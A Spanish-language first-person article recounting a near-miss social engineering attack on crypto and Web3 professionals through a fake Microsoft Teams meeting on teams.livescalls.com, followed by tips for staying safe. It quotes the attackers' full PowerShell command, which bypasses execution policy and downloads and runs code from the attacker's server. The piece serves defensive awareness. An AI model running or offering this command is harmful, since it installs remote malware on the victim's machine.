Casi me hackean una llamada de Microsoft Teams: así funciona la estafa
Déjame contarte cómo estuve a punto de convertirme en víctima de un elaborado plan de ingeniería social diseñado para explotar algo tan rutinario y aparentemente inofensivo como una llamada de Microsoft Teams el día de hoy.
Durante la mayor parte de la interacción, nada parecía fuera de lo común.
Alguien que pensé que era un contacto de la industria se comunicó conmigo para programar una reunión en Microsoft Teams, y el colaborador dispuesto que hay en mí estuvo más que feliz de sumarse a la llamada.
Alerta de spoiler: la persona del otro lado era un impostor y trató de hacerme ejecutar un código malicioso en mi computadora.
Estoy contando toda la experiencia aquí como un aviso para amigos, conocidos y contemporáneos en la comunidad criptográfica y Web3.
Hoy casi me pasó a mí, mañana podría pasarle a otra persona.
Paso 1: La configuración: "Llama para ponernos al día, viejo amigo"
Cuando recibes un mensaje de texto de la cuenta de Telegram de alguien que conoces como un empleado destacado de una conocida agencia de relaciones públicas de criptomonedas, lo último que piensas es que estás siendo engañado para que te sugiera una trampa de phishing.
Ninguna de las típicas señales de alerta se hizo evidente de inmediato.
Éste no fue un DM cualquiera.
No estaba hablando con una cuenta imitadora donde la “i” está sutilmente reemplazada por una “l”
De hecho, también tenía un historial de chat con la cuenta, así que pensé que tenía a la persona real del otro lado.
Nada parecía fuera de lugar desde que iniciaron una conversación completamente amistosa para reconectar. Poco después, un enlace de Calendly para reservar una reunión de 30 minutos y una invitación a una llamada de Microsoft Teams.
Como dije antes, no me perdí ni un segundo durante la interacción. Percibí el mismo nivel de profesionalismo y paciencia que se espera de un miembro de alto rango de una agencia de relaciones públicas de primer nivel.
Todo lo que sabía era que había programado una reunión de Teams desde la página de Calendly de un contacto de la industria.
El estafador inicia el contacto utilizando una cuenta pirateada y enviando un enlace a una reunión de Teams.
Paso 2: La trampa de “Unirse solo desde el escritorio”
Llegó el día de la reunión y, como ya lo había hecho al menos mil veces, hice clic en el enlace de la reunión de Teams en mi teléfono. Sin embargo, no me dirigí directamente a la reunión como siempre. En lugar de redirigirme a la llamada, se cargó una pantalla que decía: "No se permite el acceso a esta reunión a través de dispositivos móviles debido a la configuración del organizador"
¡Ay, ay! Nunca me había pasado esto
Bueno, tampoco fue undent .
En retrospectiva, esa fue probablemente la primera verdadera señal de alerta.
La pantalla de error forma parte del diseño. Los estafadores necesitan que uses una computadora de escritorio o portátil porque su carga maliciosa es un script de línea de comandos que solo se ejecuta en PC.
La URL en el navegador “ teams.livescalls.com” NO es el dominio real de Microsoft.
Las reuniones legítimas de Teams utilizan teams.microsoft.com o teams.live.com.
El dominio “livescalls.com” parece bastante parecido al real desde lejos, pero vaya, está muy lejos de serlo si lo miras con suficiente atención.
Uno es el sitio controlado por Microsoft que afirma tener más de 320 millones de usuarios activos diarios. El otro es un sitio completamente falso controlado por los atacantes.
Para ser justos, algunas organizaciones pueden usar dominios personalizados para sus reuniones de equipo. Sin embargo, más de un billón de dólares en fondos perdidos por estafadores en 2025, según el Foro Económico Mundial, fue razón suficiente para no ignorar mi intuición.
La página falsa "Aviso de acceso al equipo" bloquea el acceso móvil, obligando a las víctimas a usar una computadora donde se puede ejecutar el script malicioso. Tenga en cuenta la URL: teams.livescalls.com (no es un dominio de Microsoft).
El estafador presiona a la víctima para que se una a la computadora después del bloqueo móvil, alegando que "hay socios esperando"
Paso 3: La carga útil: «Actualizar el SDK de TeamsFx»
Una vez en el escritorio, la reunión falsa de Teams mostraba una página con un diseño profesional similar a la que se vería en la documentación oficial de Microsoft. Incluso incluía información real de Microsoft sobre la obsolescencia del SDK de TeamsFx en septiembre de 2025.
¿La solución? Copiar un bloque de código y ejecutarlo en la terminal o en el símbolo del sistema.
Si hicieras una búsqueda adicional en Google, descubrirías que existe un SDK similar. Simplemente no lo necesitas para esta llamada de Teams.
El código parece inofensivo a primera vista: establece variables de entorno con nombres que parecen oficiales, como TeamsFx_API_KEY y MS_Teams_API_SECRET. Pero el verdadero vector de ataque se encuentra en algún punto intermedio, y estos atacantes no cuentan con que detectes el problema:
powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”
Esta única línea omite las políticas de seguridad de PowerShell (-ep bypass), descarga el código del servidor del atacante y lo ejecuta inmediatamente (iex = Invoke-Expression).
Y así, cualquier malware, keylogger o herramienta de acceso remoto que los atacantes hayan alojado se instala silenciosamente en su dispositivo.
La interfaz falsa de la reunión de Teams muestra la página maliciosa "Actualización del SDK de TeamsFx" que se presenta a los participantes. Observe a los participantes de la llamada: vídeos generados por IA.
Paso 4: La etapa de presión “No te preocupes, es seguro”
Cuando expresé mis dudas sobre ejecutar el script, el impostor inmediatamente me ofreció una combinación de seguridad y presión.
Se suponía que la línea “No te preocupes, es muy simple y seguro para ti” me facilitaría seguir las instrucciones en la captura de pantalla que me mostraba cómo abrir el Símbolo del sistema en mi PC.
“Los socios ya se han unido a Zoom” se suponía que me haría sentir la presión de no tener que hacer que todos cambiaran de plataforma porque no podía descubrir cómo ejecutar un símbolo del sistema simple.
No me sentí tranquilo. Tampoco me sentí presionado.
Cuando sugerí cambiar la llamada a Google Meet, se negaron. Al parecer, su estafa solo funciona con su configuración falsa de Teams.
El estafador envía instrucciones paso a paso para ejecutar el código malicioso, tranquilizando a la víctima: "No te preocupes, es muy sencillo y seguro para ti"
Paso 5: Se ha llamado el farol: bloqueado y eliminado
Confirmé mis sospechas después de verificar el script y el dominio: me estaban manipulando socialmente y estaba a unos pasos de convertirme en parte de las estadísticas de 2026 del Foro Económico Mundial.
Le dije directamente al estafador: «Acabo de comprobarlo y este comando y el sitio web no son legítimos. Lamentablemente, no podré hacerlo». Le ofrecí continuar la conversación en Google Meet si aún quería chatear.
“Pero la reunión ya está en marcha”, fue el mensaje del otro lado.
Como era de esperar, su respuesta pretendía hacerme comprender la urgencia de unirme a la llamada. Al fin y al cabo, no quería hacer esperar demasiado a todos esos socios.
Momentos después, borraron toda nuestra correspondencia y me bloquearon.
Ah... Eso no es solo una señal de alerta. Hablando de tonos carmesí.
Los contactos comerciales no eliminan todo su historial de conversaciones y te bloquean en el momento en que cuestionas una actualización de software.
Después de denunciar la estafa, el atacante insiste en que la reunión "se está llevando a cabo ahora" antes de eliminar todos los mensajes y bloquear a la víctima.
Cómo protegerse
Este tipo de ataque está en auge en las industrias de las criptomonedas, la Web3 y la tecnología. Los estafadores están comprometiendo o suplantando cuentas reales de profesionales de relaciones públicas, inversores y líderes de proyectos para atacar a personas de alto valor. Aquí te explicamos cómo mantenerte seguro:
- Nunca ejecutes comandos desde una página de reunión. Ninguna plataforma legítima de videollamadas te pedirá que pegues código en tu terminal o en el Símbolo del sistema.
- Revisa la URL. Las reuniones reales de Microsoft Teams se transmiten en teams.microsoft.com o teams.live.com, no en “teams.livescalls.com” ni en ningún otro dominio similar.
- Desconfíe de los requisitos de "solo escritorio". Si una reunión bloquea el acceso móvil, es una táctica deliberada para que acceda a una máquina donde se puedan ejecutar scripts.
- Verifica a la persona a través de un canal independiente. Si un contacto conocido te envía un enlace de reunión inusual, llámalo directamente o envíale un mensaje en otra plataforma para confirmarlo.
- Presta atención a "powershell -ep bypass" e "iex". Estas son las dos principales señales de alerta en cualquier script. La primera desactiva la seguridad, la segunda ejecuta el código descargado a ciegas.
- Si ya ejecutaste el script: Desconéctate de internet inmediatamente. Ejecuta un análisis completo de malware (Malwarebytes, Windows Defender Offline). Cambia todas las contraseñas desde un dispositivo diferente y limpio. Supervisa las billeteras de criptomonedas y las cuentas bancarias para detectar transacciones no autorizadas.
Por qué esto es importante para las criptomonedas y la Web3
Yo no diría que esto es una interacción típica de phishing, donde los atacantes lanzan redes amplias y ven lo que encuentran.
No, se trató de una operación de ingeniería social dirigida que duró varios días. Los atacantes se hicieron pasar por colegas de la industria durante días, forjando una buena relación y preparándose para guiarte de forma informal a solucionar un problema técnico en una llamada de Teams mediante una página falsa y convincente de Microsoft.
Ya sea que roben susdent, vacíen su billetera de criptomonedas o instalen malware de acceso remoto persistente, los atacantes tienen todo para ganar y nada que perder.
Si eres fundador, inversor o cualquier persona que asiste a reuniones en el sector de las criptomonedas y la tecnología, comparte este artículo con tu equipo. Quienes cometen estas estafas están mejorando, y la única defensa es la concientización.
Artículos Recomendados
